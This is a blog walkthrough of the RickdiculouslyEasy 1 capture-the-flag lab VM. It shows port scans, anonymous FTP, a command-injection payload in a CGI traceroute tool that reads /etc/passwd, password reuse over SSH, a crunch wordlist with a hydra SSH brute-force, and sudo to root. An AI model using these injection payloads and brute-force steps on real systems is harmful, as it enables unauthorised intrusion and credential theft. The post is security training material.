Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

RickdiculouslyEasy 1: CTF walkthrough

 Introduction

Name: RickdiculouslyEasy: 1
Date release: 21 Sep 2017

Author: Luke
Series: RickdiculouslyEasy

 

Recognition

We scan our local network to find the IP address of the vulnerable system.

rickdiculouslyeasy_1_ctf_walkthrough_arp_scan.png

In a second time we use nmap to find all services and open ports.

root@kali:~/Desktop# nmap -A -O -p- -T5 --reason 192.168.1.45

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-14 17:53 CEST
Warning: 192.168.1.45 giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.59% done; ETC: 17:56 (0:00:09 remaining)
Nmap scan report for pc-246.home (192.168.1.45)
Host is up, received arp-response (0.011s latency).
Not shown: 65455 closed ports, 73 filtered ports
Reason: 65455 resets and 73 no-responses
PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?    syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack ttl 64 Cockpit web service
|_http-title: Did not follow redirect to https://pc-246.home:9090/
13337/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.
SF:4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(
SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=10/14%Time=59E233F0%P=x86_64-pc-linux-gnu%r(
SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\
SF:.\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
SF:everse\x20shell\.\.\.\n#\x20");
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   11.19 ms pc-246.home (192.168.1.45)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.46 seconds
root@kali:~/Desktop#
 

FTP service

An FTP service is running and apparently he don’t require credentials.

rickdiculouslyeasy_1_ctf_walkthrough_ftp_service.png

Note, the pub directory is empty.

First flag: FLAG{Whoa this is unexpected} – 10 Points

10 out of 130.

 

Cockpit web service

An uncommon port is used for an HTTP service, let’s check this one.

rickdiculouslyeasy_1_ctf_walkthrough_cockpit_web_server.png

Second flag: FLAG {There is no Zeus, in your face!} – 10 Points

20 out of 130.

 

Unknown port 13337

We found an open port, let’s try to connect to it.

root@kali:~/Desktop# nc -nvv 192.168.1.45 13337
(UNKNOWN) [192.168.1.45] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
 sent 0, rcvd 41
root@kali:~/Desktop#

No more, no less.

Third flag: FLAG:{TheyFoundMyBackDoorMorty}-10Points

30 out of 130.

 

Unknown port 60000

A reverse shell publicly accessible? Interesting.

root@kali:~/Desktop# nc -nvv 192.168.1.45 60000
(UNKNOWN) [192.168.1.45] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt    
FLAG{Flip the pickle Morty!} - 10 Points 
#

It’s a shell with an highly restrictive environment, only few commands are usable, such as lscat or whoami.

Fourth flag: FLAG{Flip the pickle Morty!} – 10 Points

40 out of 130.

 

‘Main’ website

Ok, this time we have a true website. In a first time the robots.txt file can give use a really interesting information about the /cgi-bin/ directory, two tools seems to be usable.

root@kali:~/Desktop# curl http://192.168.1.45/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
root@kali:~/Desktop#

In another time, gobuster can be use to find a directory called passwords.

Let’s see what we can find in this directory.

root@kali:~/Desktop# curl http://192.168.1.45/passwords/FLAG.txt
FLAG{Yeah d- just don't do it.} - 10 Points
root@kali:~/Desktop#

Moreover, we can find a password hidden in the source code.

root@kali:~/Desktop# curl http://192.168.1.45/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
root@kali:~/Desktop#

Fifth flag: FLAG{Yeah d- just don’t do it.} – 10 Points

Our next step is the /cgi-bin directory. The first one, root_shell.cgi, is a lose of time but the second one allow us to use the tracert command via an HTML form.

We can easily find a vulnerability in this tool that will allow us to remotely execute commands on the server.

rickdiculouslyeasy_1_ctf_walkthrough_tracertool_rce.png

Let’s enumerate the system and read files.

We will see that the cat command is unusable, fortunately for us, other commands can be use to read the content of a file, such as: less or more. Because less is more, let’s try to read the /etc/passwd file with the less command.

root@kali:/var/www/html# curl "http://192.168.1.45/cgi-bin/tracertool.cgi?ip=127.0.0.1%3Bless+%2Fetc%2Fpasswd"
[..snip..]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
[..snip..]
root@kali:/var/www/html#

We have three users.

Let’s try the previously found password with each one.

root@kali:/var/www/html# ssh Summer@192.168.1.45 -p 22222
Summer@192.168.1.45's password: 
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[Summer@pc-246 ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Summer@pc-246 ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[Summer@pc-246 ~]$ cat FLAG.txt
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[Summer@pc-246 ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@pc-246 ~]$

Sixth flag: FLAG{Get off the high road Summer!} – 10 Points

60 out of 130.

 

Morty home folder

We are in the system and we have three users, let’s try the home directory of Morty.

[Summer@pc-246 Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30 14:53 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[Summer@pc-246 Morty]$

We have a password protected zip file and an interesting password stored in a JPG file.

Actually, not really safe or protected.

rickdiculouslyeasy_1_ctf_walkthrough_safe_password_jpg_head.png

The password is: Meeseek.

We are now able to unzip the file.

[Summer@pc-246 Morty]$ unzip journal.txt.zip -d /tmp/
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: /tmp/journal.txt        
[Summer@pc-246 Morty]$ more /tmp/journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade pain
t solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was 
a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[Summer@pc-246 Morty]$

Seventh flag: FLAG: {131333} – 20 Points

80 out of 130.

 

Rick home folder

The content of the rick’s home folder.

[Summer@pc-246 RickSanchez]$ ls -lahR
.:
total 12K
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30 14:53 .bashrc
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags

./RICKS_SAFE:
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

./ThisDoesntContainAnyFlags:
total 4.0K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18 20:26 NotAFlag.txt
[Summer@pc-246 RickSanchez]$

As we can see, we have an ELF binary called safe.

Let’s upload this binary into my Linux.

[Summer@pc-246 RickSanchez]$ exit
logout
Connection to 192.168.1.45 closed.
root@kali:~/Desktop# 
root@kali:~/Desktop# scp -P22222 Summer@192.168.1.45:/home/RickSanchez/RICKS_SAFE/safe .
Summer@192.168.1.45's password: 
safe                                                                  100% 8704   845.6KB/s   00:00    
root@kali:~/Desktop#

We execute the binary, and apparently we need to use an argument.

root@kali:~/Desktop# ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
root@kali:~/Desktop#

Let’s try with the previously found hint.

root@kali:~/Desktop# ./safe 131333
decrypt:     FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.�    @
root@kali:~/Desktop#

Now, we have to find the Rick’s password.

Eight flag: FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

100 out of 130.

 

Rick’s password

One of the best tools installed on Kali Linux for password generation is crunch. This is the tool that I will use for the Rick’s password.
So, we need to have one uppercase, one digit and one word of the old Morty’s band.

  • If like me you didn’t watch the series: you can find the name here: http://rickandmorty.wikia.com/wiki/The_Flesh_Curtains

According to the crunch’s man page, we can choose our the desired pattern, maximum and minimum length.

DESCRIPTION
       Crunch  can  create  a  wordlist based on criteria you specify.  The output from crunch can be
       sent to the screen, file, or to another program.  The required parameters are:

       min-len
              The minimum length string you want crunch to start at.  This option  is  required  even
              for parameters that won't use the value.

       max-len
              The  maximum length string you want crunch to end at.  This option is required even for
              parameters that won't use the value.

       charset string

[..snip..]

        -t @,%^
              Specifies  a  pattern,  eg:  @@god@@@@  where  the only the @'s, ,'s, %'s, and ^'s will
              change.
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

We can generate two dictionary, one with the Flesh word and another one with the Curtains word.

root@kali:~/Desktop# crunch 7 7 -t ,%Flesh -o flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@kali:~/Desktop# crunch 10 10 -t ,%Curtains -o curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@kali:~/Desktop#

Finally we can use hydra for a dictionary attack on the SSH service.

root@kali:~/Desktop# hydra -l RickSanchez -P merged.txt ssh://192.168.1.45 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-14 22:40:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://192.168.1.45:22222/
[22222][ssh] host: 192.168.1.45   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-14 22:41:18
root@kali:~/Desktop#

Fortunately for us, the merged file (both generated dictionaries) contain only 780 entries and in less than a minut we can find the Rick’s password.

 

Last Flag

For this last flag, we don’t need a tricky hack or a complex exploit. Always thinking of basics things.

Rick is a super user, so, we only need to make it be a super user with the sudo command.

root@kali:~/Desktop# ssh RickSanchez@192.168.1.45 -p 22222
RickSanchez@192.168.1.45's password: 
Last login: Sun Oct 15 07:44:36 2017 from 192.168.1.107
[RickSanchez@pc-246 ~]$ sudo su
[sudo] password for RickSanchez: 
[root@pc-246 RickSanchez]# 
[root@pc-246 RickSanchez]# more /root/FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[root@pc-246 RickSanchez]#

In few seconds we have a root access to the system and the last flag.

Ninth flag: FLAG: {Ionic Defibrillator} – 30 points

rickdiculouslyeasy_1_ctf_walkthrough_rick_sudo_root.png
 
 

break